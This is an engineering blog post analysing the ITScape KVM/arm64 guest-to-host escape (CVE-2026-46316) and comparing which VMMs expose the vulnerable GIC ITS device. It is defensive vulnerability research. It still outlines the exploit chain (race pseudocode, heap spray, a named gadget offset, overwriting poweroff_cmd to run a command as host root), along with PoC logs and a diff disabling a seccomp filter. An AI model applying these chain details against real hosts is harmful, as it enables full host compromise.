Blog/Engineering

When the bug is real but the path isn't: ITScape (CVE-2026-46316) and the case for minimal runtimes

When the bug is real but the path isn't: ITScape (CVE-2026-46316) and the case for minimal runtimes

CVE-2026-46316 ("ITScape"). Reported by Hyunwoo Kim (@v4bel). This post discusses the vulnerability and its mitigations at a conceptual level using already-public information: no gadget offsets, no heap-spray primitives beyond what the author's own write-up discloses.


TL;DR

ITScape is the first publicly documented guest-to-host escape on KVM/arm64. It abuses a race condition in the in-kernel vGIC-ITS emulation to reach host-kernel code execution from inside an unprivileged guest. We reproduced it on a Jetson AGX Orin running kernel v7.1-rc6.

The defensive story is more nuanced and more honest than "unikernels are safe":

  • urunc is safe by design: urunc's seccomp filter blocks KVM_CREATE_DEVICE for the ITS type before the virtual GIC ITS object is ever created. To prove this is the active mechanism, we deliberately stripped that filter and confirmed the ITS becomes reachable immediately. The vulnerability follows directly.
  • Every other VMM we tested exposes GIC ITS: QEMU (-M virt), Cloud Hypervisor v41.0.0, Dragonball (kata runtime-rs), Firecracker ≥ v1.13.0, Kata-QEMU, and Kata-Firecracker ≥ v1.13.0 all create the ITS device unconditionally. The IIDR read confirms 0x4b00043b in each case.
  • Firecracker ≤ v1.12.1 is the one architectural exception: that codebase contains zero ITS-related symbols. From v1.13.0 onward, PR #5364 introduced ITS unconditionally as a PCIe prerequisite, without a CHANGELOG entry.

The broader lesson is sharper than "minimal runtimes are safe": every modern VMM on aarch64 now exposes GIC ITS. urunc's seccomp filter is the only runtime default that blocks the attack surface. That filter is operational, not architectural: one config change away from exposure. Firecracker ≤ v1.12.1 is the only VMM where the absence is structural.


1. The vulnerability

ITScape is a race condition in the in-kernel KVM arm64 interrupt controller emulation, specifically in vgic_its_invalidate_cache() combined with vgic_its_process_commands() in arch/arm64/kvm/vgic/. A guest with EL1 (kernel) privilege drives the virtual GIC ITS via MMIO; two concurrent accesses to the same vgic_irq refcount produce a double-put, leading to a use-after-free on a kmalloc-96 object in the host kernel.

What makes it notable:

  • In-kernel KVM, not QEMU. Most published VM escapes are bugs in the userspace device model and grant at most QEMU-process privileges. ITScape runs in the host kernel's context; success is a full host-kernel compromise.
  • Guest-driven. No host-side action is needed; the guest triggers it through ordinary MMIO writes.
  • arm64-specific. The bug is in arch/arm64/kvm/vgic/. x86 is unaffected.
  • Affected range: 8201d1028caa (2024-04-25) → 13031fb6b835 (2026-06-05, the fix).

The full exploit chain on v7.1-rc6 with nokaslr on the Jetson AGX Orin:

  1. Race INT commands vs GICR_CTLR.EnableLPIs toggle → double-put on vgic_irq → UAF
  2. 64 MB guest_memfd cross-cache spray reclaims freed kmalloc-96 slot with a fake vgic_irq
  3. Leak target_vcpu pointer from fake object → kimage_voffset = 0x0 (nokaslr)
  4. Arbitrary write via ed_deschedule+0xf4 gadget: ldr x0,[x1,#32]; cbz; ldr x1,[x1,#40]; str x1,[x0,#40]; ret
  5. Overwrite poweroff_cmd = "/bin/touch /ITScape" and arp_tbl.gc_work.func = orderly_poweroff
  6. Neigh-GC timer fires → orderly_poweroff() → usermode helper runs /bin/touch /ITScape as uid=0 on the host

The race at the heart of the bug looks like this in the host kernel:

/* Thread A (guest INT command handler) */
irq = vgic_its_check_cache(its, device_id, event_id);
vgic_put_irq(kvm, irq);          // refcount--; may reach 0 -> kfree()
 
/* Thread B (guest GICR_CTLR.EnableLPIs toggle) */
vgic_its_invalidate_cache(its);  // iterates cache, calls vgic_put_irq()
    vgic_put_irq(kvm, irq);      // second put on same object -> UAF

Both threads are driven by ordinary guest MMIO writes with no host-side action required. The freed kmalloc-96 object is then reclaimed via a cross-cache spray from guest_memfd, giving the attacker a controlled fake vgic_irq in host-kernel memory.

Figure 1: the full chain from guest MMIO writes to host-root UMH execution
Figure 1: the full chain from guest MMIO writes to host-root UMH execution


2. Reproduction on Jetson AGX Orin

Platform: Jetson AGX Orin · kernel v7.1-rc6 · GCC 11.4 · nokaslr · GICv3+GIC-600 hardware

The itscape:latest container image is a FROM scratch image carrying three binaries: guest_exploit (the in-guest ITS trigger), host_exploit (the full KVM-selftest PoC), and the exploit kernel Image. It is built with GCC 13 inside a Ubuntu 22.04 builder stage. GCC 13 is required for the specific ed_deschedule+0xf4 gadget codegen. Kernel addresses are patched at build time by patch_addresses.py for the v7.1-rc6 / GCC 11.4 / nokaslr build.

The guest-side trigger (guest_exploit.c) maps the ITS and GICR MMIO regions via /dev/mem (requiring CONFIG_STRICT_DEVMEM=n in the guest kernel), reads the ITS IIDR register to confirm ITS presence, initialises the ITS command queue and redistributor LPI tables, creates 64 devices × 32 events (2048 LPIs), and then races two threads: one issuing INT commands, the other toggling GICR_CTLR.EnableLPIs. The guest kernel is booted with irqchip.gicv3_nolpi=1 to prevent the in-guest GIC driver from claiming the ITS before the exploit can.

Scenario 1: Direct KVM PoC (/ITScape created as root)

$ sudo /home/ananos/ITScape/poc
Random seed: 0x11355329
=== vgic_its_guest_escape vcpus=4 dev=128 ev=1024 uid=0 ===
[*] exploit running - waiting for the host kernel to create /ITScape as root (up to ~150s)...
cross-cache fill across 64 MB gmem
leak: MOVI vcpu0 leak (gmem irq target_vcpu@48 <- real vcpu0)
leak: gmem+48 = 0xffff0000d8002340 (real vcpu0 kernel pointer)
ISO-LEAK: V=0xffff0000d8002340 target_vcpu=0xffff0000d80025e0
cpuid2 image ptr 0xffff800080092d38 -> kimage_voffset 0x0
cpuid3 image ptr 0xffff800080092d38 -> kimage_voffset 0x0
cpuid1 image ptr 0xffff800080092d38 -> kimage_voffset 0x0
ops landing = 0xffff0000cd3a6060, gadget = 0xffff800080de01b8
WWW done (poweroff_cmd + orderly_poweroff planted); waiting for neigh-gc UMH

[+] /ITScape created by the host kernel (owner uid=0). verify:  ls -la /ITScape

$ ls -la /ITScape
-rw-r--r-- 1 root root 0 Jun 11 20:38 /ITScape
$ id
uid=1000(ananos) gid=1000(ananos) [...]

The file is owned by root. The process that triggered it was the host kernel's usermode helper. The user running the PoC was uid=1000.


3. The actual protection mechanism: what stops it

The ITS IIDR as a canary

guest_exploit.c reads the ITS IIDR register as its very first action after mapping the MMIO:

uint32_t iidr = readl_its(0x0004);
if (iidr == 0 || iidr == 0xFFFFFFFF) {
    printf("[-] ITS not accessible (IIDR=0x%x). No ITS in this VM → safe.\n", iidr);
    return 1;
}
printf("[*] ITS IIDR: 0x%08x (ITS present)\n", iidr);

IIDR = 0x0 means the host kernel never created the vgic_its object. IIDR = 0x4b00043b means it did. This single register read is the dividing line between every safe and unsafe scenario in the table below.

The vgic_its object only exists if someone called ioctl(vmfd, KVM_CREATE_DEVICE, .type=KVM_DEV_TYPE_ARM_VGIC_ITS). Every protection in the table below reduces to one question: was that ioctl allowed to complete?

Scenario 2: urunc stock (ITS blocked)

$ sudo nerdctl run --runtime io.containerd.urunc.v2 --rm itscape:latest

============================================
  CVE-2026-46316 guest-to-host ITS trigger
============================================

[*] ITS  base: 0x8080000
[*] GICR base: 0x80a0000
[*] ITS  mapped at 0xffffa2426000
[*] GICR mapped at 0xffffa2406000
[-] ITS not accessible (IIDR=0x0). No ITS in this VM → safe.

Why: urunc passes --sandbox on,obsolete=deny,elevateprivileges=deny,spawn=deny,resourcecontrol=deny to QEMU, which applies a seccomp filter to the QEMU process. KVM_CREATE_DEVICE for KVM_DEV_TYPE_ARM_VGIC_ITS is a blocked syscall path. The vgic_its object is never created. Machine type: still -M virt (GICv3+ITS capable). The hardware hasn't changed. The protection is the syscall filter.

Scenario 3: urunc with seccomp deliberately removed (ITS exposed)

To confirm that the seccomp filter is the active protection mechanism (not QEMU's machine type, not the hardware, not anything else), we stripped it from urunc with a one-line change in pkg/unikontainers/hypervisors/qemu.go. This is a deliberate proof-by-removal experiment, not a realistic deployment scenario:

-    if args.Seccomp {
+    if false && args.Seccomp { // seccomp disabled for testing
$ sudo nerdctl run --runtime io.containerd.urunc.v2 --rm itscape:latest

============================================
  CVE-2026-46316 guest-to-host ITS trigger
============================================

[*] ITS  base: 0x8080000
[*] ITS  mapped at 0xffffb0d9b000
[*] GICR mapped at 0xffffb0d7b000
[*] ITS IIDR: 0x4b00043b (ITS present)
[*] ITS enabled: CTLR=0x80000001 CBASER=0x9800000042f10780
[*] LPIs enabled on GICR: CTLR=0x7
[*] Mapped 64 devices × 32 events = 2048 LPIs
[*] Starting race (2000000 iterations)...

Removing one if, and nothing else, brings the full race into reach. Everything else is identical: same QEMU binary, same -M virt machine type, same host kernel, same hardware. The only variable is whether urunc's existing seccomp filter is in effect. The vGIC-ITS UAF path is live. Combined with the full chain from Scenario 1, this reaches host root. This confirms the seccomp filter is the mechanism, not a coincidence of configuration.

Figure 2: same QEMU, same -M virt, same hardware. Only the seccomp filter changes. Safe vs. vulnerable is decided at the syscall boundary.
Figure 2: same QEMU, same -M virt, same hardware. Only the seccomp filter changes. Safe vs. vulnerable is decided at the syscall boundary.


4. Runtime comparison

RuntimeHypervisorITS seccomp blocked?ITS in binary?IIDRCVE-2026-46316Evidence
Direct KVM (poc.c)KVM APIN/AN/A0x4b00043b⚠️ VULNERABLE/ITScape created
urunc stockQEMUYes (urunc --sandbox)Yes0x0🛡️ SAFEIIDR=0x0 observed
urunc (seccomp removed, proof-of-mechanism)QEMUNo (filter deliberately stripped)Yes0x4b00043b⚠️ VULNERABLEIIDR=0x4b00043b, race live
Kata-QEMUQEMU 9.1.2 (kata-static)NoYes0x4b00043b⚠️ VULNERABLE✓ ITS in guest dmesg
Kata-Firecracker (≤ v1.12.1)Firecracker ≤ v1.12.1N/ANo0x0🛡️ SAFE✓ zero ITS symbols in binary
Kata-Firecracker (≥ v1.13.0)Firecracker ≥ v1.13.0N/AYes0x4b00043b⚠️ VULNERABLEIIDR=0x4b00043b observed
Firecracker ≤ v1.12.1Firecracker ≤ v1.12.1N/ANo0x0🛡️ SAFE✓ zero ITS symbols in binary
Firecracker ≥ v1.13.0Firecracker ≥ v1.13.0N/AYes0x4b00043b⚠️ VULNERABLEIIDR=0x4b00043b, race confirmed
Cloud Hypervisor v41.0.0Cloud HypervisorN/AYes0x4b00043b⚠️ VULNERABLEIIDR=0x4b00043b, race confirmed
Dragonball (kata runtime-rs)DragonballN/AYes0x4b00043b⚠️ VULNERABLE✓ 2 ITS devices in guest dmesg

The pattern is unambiguous: every modern VMM on aarch64 exposes GIC ITS. For all QEMU-based stacks and Dragonball, the only thing preventing ITS creation is an external policy. Through v1.12.1, Firecracker was the sole exception: strings over the binary returned zero matches for GITS, vgic_its, or KVM_DEV_TYPE_ARM_VGIC_ITS. That changed with PR #5364, merged 2025-08-12 and shipped in v1.13.0 (2025-08-28). urunc stock is the only runtime in this table where the ITS is blocked by default, and that protection is a seccomp filter, not an absence of code.


5. VMM coverage: the broader picture

Kata-QEMU and Kata-Firecracker ≥ v1.13.0 are vulnerable for the same reasons as standalone QEMU and Firecracker. But the finding goes further: every other VMM we tested on aarch64 also exposes GIC ITS.

configuration-qemu.toml sets machine_type = "virt" and does not apply urunc's --sandbox seccomp profile. The GICv3+ITS is created identically to a direct KVM call. The Kata guest kernel enumerates and fully initialises the ITS at boot, visible in dmesg from /opt/kata/bin/qemu-system-aarch64 (QEMU 9.1.2, kata-static) with -machine virt -enable-kvm:

[    0.000000] GICv3: GICv3 features: 16 PPIs, DirectLPI
[    0.000000] ITS [mem 0x08080000-0x0809ffff]
[    0.000000] ITS@0x0000000008080000: allocated 8192 Devices @41440000 (indirect, esz 8, psz 64K, shr 1)
[    0.000000] ITS@0x0000000008080000: allocated 8192 Interrupt Collections @41450000 (flat, esz 8, psz 64K, shr 1)
[    0.000000] GICv3: using LPI property table @0x0000000041460000

The ITS device, collection tables, and LPI property table are all live before any workload starts. The vgic_its_invalidate_cache() race path is fully reachable. Kata-QEMU on an unpatched arm64 host is vulnerable to ITScape.

For Firecracker ≤ v1.12.1 (and Kata-Firecracker running that version), the answer was architectural: a strings pass returned zero matches for GITS, vgic_its, or KVM_DEV_TYPE_ARM_VGIC_ITS. Firecracker provisioned a GICv3 distributor and redistributor for SPI/SGI/PPI delivery, but the ITS code path simply did not exist and could not be re-enabled by any configuration change.

Firecracker v1.13.0 changes the picture. PR #5364 ("Add PCI support on Firecracker", merged 2025-08-12) introduced ITS support via commit 3b943af0 ("arm: support MSI-X on ARM") as a prerequisite for PCIe/MSI-X on aarch64. From that release onward, GICv3::create() unconditionally calls init_its(), which issues KVM_CREATE_DEVICE { type: KVM_DEV_TYPE_ARM_VGIC_ITS }. The guest observes IIDR = 0x4b00043b. The attack surface is identical to standard QEMU on -M virt. What makes this particularly sharp: the change was not flagged in the CVE advisory, the v1.13.0 release notes, or the CHANGELOG. Operators who upgraded Firecracker for PCIe support acquired ITS exposure without being told. Kata-Firecracker deployments running v1.13.0 or later are in the same position as Kata-QEMU.

Cloud Hypervisor v41.0.0 also exposes the ITS unconditionally:

[*] ITS  base: 0x8f90000
[*] GICR base: 0x8fb0000
[*] ITS IIDR: 0x4b00043b (ITS present)
[*] ITS enabled: CTLR=0x80000001 CBASER=0x9800000043210780
[*] LPIs enabled on GICR: CTLR=0x7
[*] Mapped 64 devices × 32 events = 2048 LPIs
[*] Starting race (200000 iterations)...
[*] Race complete. Check host dmesg for: 'refcount_t: underflow; use-after-free'

Dragonball (the embedded VMM used by Kata's runtime-rs, io.containerd.kata-rs.v2) exposes two ITS devices, confirmed by guest dmesg:

[    0.000000] ITS [mem 0x3ffb0000-0x3ffcffff]
[    0.000000] ITS@0x000000003ffb0000: allocated 8192 Devices (indirect, esz 8, psz 64K, shr 1)
[    0.000000] ITS@0x000000003ffb0000: allocated 8192 Interrupt Collections (flat, esz 8)
[    0.000000] ITS [mem 0x3ff90000-0x3ffaffff]
[    0.000000] ITS@0x000000003ff90000: allocated 8192 Devices (indirect, esz 8, psz 64K, shr 1)

Dragonball calls KVM_CREATE_DEVICE for the ITS unconditionally (confirmed by binary: struct Gicv3ItsState and gic-v3-its device strings in the embedded VMM). Two ITS instances means two independent races reachable from the guest.

One structural note: Kata's entire security premise is the KVM isolation boundary. ITScape is a bug in that boundary itself (in host-kernel code, not in the userspace device model). When the ITS path is reachable, this is precisely the class of bug that defeats Kata's core guarantee. The workload in a Kata pod runs at EL0 (userspace inside the guest), so an attacker would need to chain a guest-kernel LPE to EL1 before ITScape applies. That is a real additional hurdle. But in a deployment where the tenant supplies their own kernel image (as in urunc's serverless target), that hurdle is gone by construction.

Figure 3: Kata's three hypervisor lanes, with the urunc-vs-Kata-QEMU contrast in the footer.
Figure 3: Kata's three hypervisor lanes, with the urunc-vs-Kata-QEMU contrast in the footer.


6. Reachability and defense-in-depth

Figure 4: every path to vgic_its_invalidate_cache() from the left (direct KVM, Kata-QEMU, urunc-patched), and every cut path from the right (urunc-stock via seccomp, Firecracker-based via no-ITS codebase). The patch (13031fb6b835) removes the bug from the function itself, orthogonal to all of the above.
Figure 4: every path to vgic_its_invalidate_cache() from the left (direct KVM, Kata-QEMU, urunc-patched), and every cut path from the right (urunc-stock via seccomp, Firecracker-based via no-ITS codebase). The patch (13031fb6b835) removes the bug from the function itself, orthogonal to all of the above.

The key distinction, stated precisely:

  • Seccomp (urunc stock): a policy-enforcement mechanism. Correct by default, revocable by a one-line config change in urunc itself. Protects against an operator that controls the VMM invocation. Does not protect against a tenant who can modify the seccomp profile or bypass it through another route.
  • No ITS in codebase (Firecracker ≤ v1.12.1): an architectural property. Not a policy; not a config; not revocable without modifying and rebuilding the VMM. Protects even if all other layers are misconfigured. This no longer applies from v1.13.0 onward, where ITS arrived silently as a PCIe prerequisite.
  • Patch (13031fb6b835): removes the bug itself. Independent of reachability. Should be applied regardless.

These are three layers that address three different threat models. Defense in depth means using all three where possible. On arm64 today: patch the host; recognise that every modern VMM exposes ITS by default, so the seccomp filter (or version pin to FC ≤ v1.12.1) is not optional; and confirm IIDR=0x0 from inside the guest as a runtime check: it is the only definitive signal regardless of what you believe about your VMM configuration or version.


7. Honest caveats

urunc's protection is operational, not architectural. This is the most important correction from the original framing. The safety of urunc stock comes from urunc's own configuration, specifically one argument group it passes to QEMU. That is real, meaningful protection for the common deployment path. But it is not the same strength as "Firecracker's binary has no ITS code."

Firecracker's no-ITS guarantee is version-gated, and the boundary arrived without announcement. Through v1.12.1, the architectural argument holds cleanly: zero ITS symbols, no call path. From v1.13.0 onward (released 2025-08-28), ITS support was added as an implementation detail of PR #5364 ("Add PCI support on Firecracker"); commit 3b943af0 introduced init_its() as a prerequisite for MSI-X on aarch64. It was not flagged in the CVE advisory, the v1.13.0 release notes, or the CHANGELOG. Operators who upgraded for PCIe support silently acquired ITS exposure. If you are relying on Firecracker's architectural posture, pin to ≤ v1.12.1 or verify IIDR=0x0 at runtime regardless of version.

The Firecracker jailer does not mitigate this. The jailer applies a seccomp BPF filter to the Firecracker process, but it operates at syscall granularity: it allowlists syscall numbers, not ioctl arguments. KVM_CREATE_DEVICE is an ioctl, and ioctl must remain in the allowlist for normal Firecracker operation (GIC distributor, redistributor, and many other devices are created the same way). The jailer cannot distinguish ioctl(fd, KVM_CREATE_DEVICE, {.type=KVM_DEV_TYPE_ARM_VGIC_ITS}) from any other ioctl call. On Firecracker ≥ v1.13.0, init_its() is called unconditionally before any guest code runs. The jailer is in place, and the ITS is still created regardless.

The ITS is not the only host-kernel surface a guest can reach. Patching removes this specific bug. Removing the ITS removes this specific path. The KVM core, the PSCI/hypercall surface, the virtio-mmio device emulation, and the monitor process itself all remain. A different bug in a feature the guest does use would not be helped by any of the above.

kconfig is not a host protection in multi-tenant deployments. If the tenant controls the guest kernel image, they control EL1, and they can re-enable CONFIG_ARM_GIC_V3_ITS in their own build. Stripping ITS from the guest kernel kconfig only defends the host when the operator also controls the guest image.

Verify, don't assume. The IIDR read is a one-liner that can be built into any container health check or CI gate. If IIDR != 0x0, the ITS is present regardless of what you believe about your seccomp configuration.


8. Conclusion

ITScape demonstrates that arm64 KVM hosts carry in-kernel, guest-reachable surface that can reach host-kernel privilege without passing through the userspace device model at all. The fix is commit 13031fb6b835. The complementary finding is blunter than we expected: every modern VMM on aarch64 (QEMU, Cloud Hypervisor, Dragonball, Firecracker ≥ v1.13.0) exposes GIC ITS unconditionally. The only runtime that blocks it by default is urunc, through a seccomp filter.

The honest version of the "minimal runtime" argument has to account for this: the question is not which VMM you run, but whether KVM_CREATE_DEVICE for the ITS type is ever allowed to complete. urunc's seccomp posture is the correct default and it works, but it is one filtered syscall away from exposure. Firecracker ≤ v1.12.1 is the only VMM where that absence is structural rather than policy-based, and that guarantee ended with v1.13.0, without a changelog entry. Knowing which layer is doing the work, and which version holds the guarantee, tells you exactly where to focus your hardening, your auditing, and your regression tests.

Apply the patch. Verify IIDR=0x0. Treat the ITS as present unless you have confirmed evidence otherwise.


References

The gap between "safe by default" and "safe when configured correctly" is exactly where incidents happen. At NOFire, we build with minimal attack surface enforced from the start, not as a configuration option, but as a design constraint. If you want to understand what your runtime stack actually exposes before the next CVE tests it, request a demo.

Talk to a founder

See where your agents are blind in production.

A 30-minute call with a founder. We map your stack to the Context & Control Model, live.

Book a demo